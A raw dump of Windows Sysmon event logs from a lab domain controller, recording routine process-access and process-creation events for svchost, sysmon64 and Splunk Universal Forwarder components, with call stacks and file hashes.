13:57:02.886{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007998Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:02.886{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007997Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:02.886{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007996Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:02.886{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007995Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:02.886{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007994Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:02.886{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007993Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:02.886{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-862E-5FCF-5C01-000000009101}4364C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007992Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:02.886{10ACEC4A-85E9-5FCF-1B01-000000009101}18402620C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-862E-5FCF-5C01-000000009101}4364C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007991Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:02.886{10ACEC4A-862E-5FCF-5C01-000000009101}4364C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007990Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:02.214{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-862E-5FCF-5B01-000000009101}2556C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007989Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:02.214{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007988Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:02.214{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007987Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:02.214{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007986Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:02.214{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007985Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:02.214{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007984Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:02.214{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007983Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:02.214{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007982Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:02.214{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007981Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:02.214{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007980Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:02.214{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-862E-5FCF-5B01-000000009101}2556C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007979Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:02.214{10ACEC4A-85E9-5FCF-1B01-000000009101}18402620C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-862E-5FCF-5B01-000000009101}2556C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007978Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:02.215{10ACEC4A-862E-5FCF-5B01-000000009101}2556C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008017Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:03.542{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-862F-5FCF-5D01-000000009101}3052C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008016Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:03.542{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008015Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:03.542{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008014Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:03.542{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008013Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 